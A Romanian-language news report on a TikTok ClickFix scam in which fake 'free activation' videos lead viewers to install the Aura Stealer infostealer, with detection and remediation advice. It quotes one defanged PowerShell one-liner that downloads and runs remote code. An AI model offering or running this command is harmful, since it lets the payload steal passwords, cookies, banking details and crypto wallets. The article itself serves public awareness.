O campanie periculoasă pe TikTok promite că conturile Netflix gratuite vor instala programe malware și vor fura date – iată cum să le detectăm

Un nou tip de furt de date a fost detectat pe TikTok, unde circulă videoclipurideo care învață metode presupuse de a descărca versiuni gratuite de programe precum Windows, Netflix sau Photoshop.

În spatele acestor tutoriale false se află o fraudă cibernetică menită să fure informațiile personale și financiare ale utilizatorilor, așa cum a dezvăluit expertul în securitate cibernetică Xavier Mertens, de la SANS Internet Storm Center (ISC).

Videoclipurile, care folosesc un ton casual și par a fi ghiduri inofensive, instruiesc utilizatorii să execute comenzi pe computerele lor.

Cu toate acestea, În loc să activeze funcțiile „premium”, comenzile instalează software rău intenționat. Această metodă, identificată ca ClickFix, a fost raportată mai devreme de portalul de securitate cibernetică „Trend Micro” și acum s-a extins pe TikTok datorită prezenței mari a utilizatorilor tineri interesați de trucuri tehnologice și de descărcări gratuite.

Mertens a avertizat că TikTok a devenit un canal atractiv pentru infractorii cibernetici, deoarece dinamica sa încrederii între creer și utilizatorii facilitează răspândirea rapidă a videoclipurilor înșelătoare. „Este o formă foarte eficientă de inginerie socială. Oamenii au încredere în creatori și nu bănuiesc că o simplă comandă le-ar putea compromite securitatea.” a remarcat analistul.

Unul dintre exemplele detectate arată un videoclip care promite să activeze Photoshop gratuit, cerând utilizatorilor să execute următoarea comandă în PowerShell:

• iex (irm slmgr[.]win/photoshop).

Deși pare o instrucțiune tehnică inofensivă, de fapt conectează computerul la un server la distanță care descarcă fișiere rău intenționate. Potrivit portalului „Bleeping Computer”, aceste fișiere conțin o variantă a malware-ului Aura Stealer.capabil să extragă parole salvate în browsere, cookie-uri de autentificare, detalii bancare și portofele criptomonede.

Experții recomandă persoanelor care au urmat instrucțiunile din aceste videoclipuri să-și schimbe imediat toate parolele, cum ar fi cele pentru e-mail, rețele sociale și conturi bancare. De asemenea, executați o scanare completă cu un antivirus actualizat și evitați să rulați comenzi sau descărcări care nu provin din surse oficiale.